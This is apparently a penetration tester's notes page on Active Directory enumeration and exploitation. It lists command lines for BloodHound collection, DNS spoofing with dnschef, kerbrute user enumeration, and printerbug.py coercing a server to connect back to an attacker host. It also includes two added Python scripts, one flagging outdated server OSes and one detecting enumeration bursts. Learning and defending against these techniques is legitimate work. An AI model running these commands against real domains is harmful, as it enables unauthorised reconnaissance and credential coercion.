xct's notes
Domain Enum & Exploitation

Bloodhound

Standalone

SharpHound.exe -c all,gpolocalgroup

Via Covenant

Assembly /assemblyname:"winsrv" /parameters:"\"-c All GPOLocalGroup\""

Via Impacket

bloodhound-python -c all -u <user> -p <password> -d <domain> -dc <> -ns <optional nameserver>

Sometimes this results in a DNS timeout; in that case we can use dnschef.py:
sudo sh -c 'python3 dnschef.py --fakeip <dc ip> --fakedomains <domain> -q'

ACLight

ACLight is a great script that finds highly privileged accounts using PowerView and then creates a report.

Find OS Versions

Get-ADComputer -Filter {(OperatingSystem -like '*Server 2012*')} -Properties * | Sort-Object | Select-Object DNSHostName, IPv4Address, whenCreated, OperatingSystem
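The query above is usually run to find hosts on old server builds. As an added example (not part of xct's notes), the Python script below takes a CSV export with the same four columns the query selects and buckets each host by whether its OS family is still inside Microsoft extended support as of a given date. The CSV rows are constructed, the hostnames and addresses are made up, and the lifecycle table is a partial list of server versions; anything not in it is reported as "unknown" rather than guessed.

```python
"""Bucket AD computer objects by OS support status (added example, not xct's code)."""
import csv
import io
from datetime import date

# End of Microsoft extended support per server family (partial list; unlisted
# versions are deliberately reported as "unknown" instead of being guessed).
EXTENDED_SUPPORT_END = {
    "Windows Server 2008": date(2020, 1, 14),
    "Windows Server 2008 R2": date(2020, 1, 14),
    "Windows Server 2012": date(2023, 10, 10),
    "Windows Server 2012 R2": date(2023, 10, 10),
    "Windows Server 2016": date(2027, 1, 12),
    "Windows Server 2019": date(2029, 1, 9),
    "Windows Server 2022": date(2031, 10, 14),
}

# Constructed sample export with the columns selected by the Get-ADComputer
# query (hostnames, addresses and dates are made up).
SAMPLE_CSV = """DNSHostName,IPv4Address,whenCreated,OperatingSystem
dc01.corp.local,10.0.0.10,2019-03-04,Windows Server 2019 Datacenter
files01.corp.local,10.0.0.21,2014-06-11,Windows Server 2012 R2 Standard
app02.corp.local,10.0.0.22,2012-01-20,Windows Server 2008 R2 Enterprise
web03.corp.local,10.0.0.23,2021-09-01,Windows Server 2022 Standard
legacy.corp.local,,2009-05-05,Windows NT
"""


def support_end(os_name):
    """Return the extended-support end date for an AD OperatingSystem string.

    AD stores edition suffixes ("Standard", "Datacenter"), so match on the
    longest known family prefix; "Windows Server 2012 R2 Standard" must map
    to the R2 entry, not to plain "Windows Server 2012".
    """
    match = max(
        (family for family in EXTENDED_SUPPORT_END if os_name.startswith(family)),
        key=len,
        default=None,
    )
    return EXTENDED_SUPPORT_END[match] if match else None


def classify_hosts(csv_text, today=None):
    """Group DNSHostNames into supported / unsupported / unknown as of `today`.

    `today` is an ISO date string (e.g. "2024-05-01"); None means the current date.
    """
    ref = date.fromisoformat(today) if today else date.today()
    buckets = {"unsupported": [], "supported": [], "unknown": []}
    for row in csv.DictReader(io.StringIO(csv_text)):
        end = support_end(row["OperatingSystem"])
        if end is None:
            key = "unknown"
        elif end < ref:
            key = "unsupported"
        else:
            key = "supported"
        buckets[key].append(row["DNSHostName"])
    return buckets


if __name__ == "__main__":
    for bucket, hosts in classify_hosts(SAMPLE_CSV, "2024-05-01").items():
        print(f"{bucket:12s} {', '.join(hosts) or '-'}")
```

To use it on real data, pipe the query into Export-Csv and read that file instead of SAMPLE_CSV; the "unknown" bucket is worth reviewing by hand, since it catches both unrecognised builds and objects with an empty OperatingSystem attribute.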

Userenum

Kerbrute

kerbrute userenum -d <domain> <userlist> --dc <>
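The detection-side counterpart, added here as an example and not part of xct's notes: kerbrute userenum sends one AS-REQ per candidate name, and a domain controller logs every name that does not exist as Event ID 4768 with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN). The script below scans a constructed set of sample events (a made-up one-line-per-event format, not a real Windows export) and flags any client address that produces a burst of such failures in a short window. The threshold and window size are assumptions to tune per environment.

```python
"""Flag bursts of 4768 / 0x6 failures per source address (added example, not xct's code)."""
from collections import defaultdict
from datetime import datetime, timedelta

KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"  # "client not found in Kerberos database"

# Constructed sample events (not a real export). One event per line:
#   <UTC timestamp> <event id> <account name> <client address> <result code>
SAMPLE_EVENTS = [
    "2024-05-01T10:00:00Z 4768 alice 10.0.0.5 0x0",   # normal TGT request
    "2024-05-01T10:00:03Z 4768 alcie 10.0.0.5 0x6",   # a single typo, benign
    "2024-05-01T10:05:00Z 4768 bob 10.0.0.7 0x0",
    "2024-05-01T10:06:00Z 4771 bob 10.0.0.7 0x18",    # bad password, different event
] + [
    # burst: 12 unknown principals from one host within about 30 seconds
    f"2024-05-01T10:10:{2 * i:02d}Z 4768 guess{i:02d} 10.0.0.99 0x6"
    for i in range(12)
]


def parse_event(line):
    """Split one sample line into its five fields."""
    ts, event_id, account, client, code = line.split()
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "event_id": int(event_id),
        "account": account,
        "client": client,
        "code": code,
    }


def find_enum_bursts(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {client: (failures, distinct_accounts)} for sources whose densest
    window of 4768/0x6 events reaches `threshold`.

    A sliding window over the time-sorted failures per client finds the
    busiest span; distinct account names are reported because enumeration
    tries many different names, whereas a mistyped login repeats one.
    """
    by_client = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        if ev["event_id"] == 4768 and ev["code"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            by_client[ev["client"]].append(ev)

    findings = {}
    for client, evs in by_client.items():
        evs.sort(key=lambda e: e["ts"])
        best = (0, 0)
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            count = end - start + 1
            if count > best[0]:
                distinct = len({e["account"] for e in evs[start:end + 1]})
                best = (count, distinct)
        if best[0] >= threshold:
            findings[client] = best
    return findings


if __name__ == "__main__":
    for client, (count, distinct) in find_enum_bursts(SAMPLE_EVENTS).items():
        print(f"{client}: {count} unknown-principal failures, {distinct} distinct names")
```

Only the misses are loud: a name that does exist does not produce a 0x6 failure, so the signal is the volume of unknown principals from one source rather than any single event, which is why the script keys on the densest window per client address.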

Printerbug

Exploit a flaw in MSRPC to get a connect-back from a vulnerable server via printerbug.py:
python printerbug.py <domain>/<user>@<rhost> <lhost>

Read Remote Registry

We can read a remote machine's registry with a service ticket (which can be generated with "getST.py" if we have a user's credentials or hash) and "runas /netonly". This only works if the user we are targeting has a session on the target system (check in BloodHound).